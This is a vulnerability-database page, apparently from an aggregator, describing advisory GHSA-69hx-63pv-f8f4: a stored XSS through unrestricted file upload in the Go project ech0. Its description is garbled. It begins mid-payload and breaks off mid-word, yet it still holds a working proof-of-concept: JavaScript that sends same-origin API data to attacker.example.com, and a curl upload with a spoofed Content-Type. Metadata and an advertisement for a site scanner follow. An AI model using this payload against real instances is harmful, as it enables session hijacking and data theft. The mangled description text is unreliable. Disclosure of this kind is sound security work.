🛡️ GHSA-69hx-63pv-f8f4 — ech0
Description
XSS in ' + document.domain + '
'); // Exfiltrate data from same-origin API fetch('/api/echo/page').then(r=>r.json()).then(d=>{ new Image().src='https://attacker.example.com/?d='+btoa(JSON.stringify(d)); }); HTMLEOF # 2. Upload with spoofed Content-Type curl -X POST http://target:1024/api/files/upload \ -H 'Authorization: Bearer ' \ -F '[email protected];type=image/jpeg' \ -F 'category=image' \ -F 'storage_type=local' # 3. Access without authentication — renders as text/html: # GET http://target:1024/api/files/files/__.html ``` ## Impact - **Stored XSS in the application origin**: JavaScript executes in the context of the Ech0 application domain when any user visits the file URL directly. - **Session hijacking**: Attacker script can access same-origin cookies and API endpoints, enabling theft of admin session tokens. - **Persistent backdoor**: The malicious file rHow this vulnerability can be exploited
This issue can be reached over the network, attack complexity is low, an attacker needs administrative privileges on the target. A user must be tricked into taking some action. The scope is changed, meaning a successful attack can affect components beyond the vulnerable one. Rated impact: confidentiality low, integrity low, availability none.
Weakness class
GHSA-69hx-63pv-f8f4 is classified as CWE-434: Unrestricted Upload of File with Dangerous Type. Uploads are accepted without restricting type, so an executable file can be placed where the server will run it.
Affected software
GHSA-69hx-63pv-f8f4 is recorded against 1 package.
- github.com/lin-snow/ech0
Timeline and source
Published on 10 April 2026 and last revised on 25 June 2026. No public exploit is currently recorded for this entry. Record sourced from OSV.
References
Details
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
Affected Packages
| Software | From version | Fixed in |
|---|---|---|
| github.com/lin-snow/ech0 | — | — |
References
Similar Threats
- High GHSA-mqxv-9rm6-w8qc
- Unknown GO-2026-5100
- Unknown GO-2026-5123
- High GHSA-8mc6-xjpr-h98x
- Unknown GHSA-3v85-fqvh-7rxf
Free Vulnerability Check
Is your site affected by GHSA-69hx-63pv-f8f4?
BotEraser helps you identify potentially vulnerable plugins and themes by checking your installation against GHSA-69hx-63pv-f8f4 and other known CVE records.
Scan My Site Free →No credit card required · Results in minutes
ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.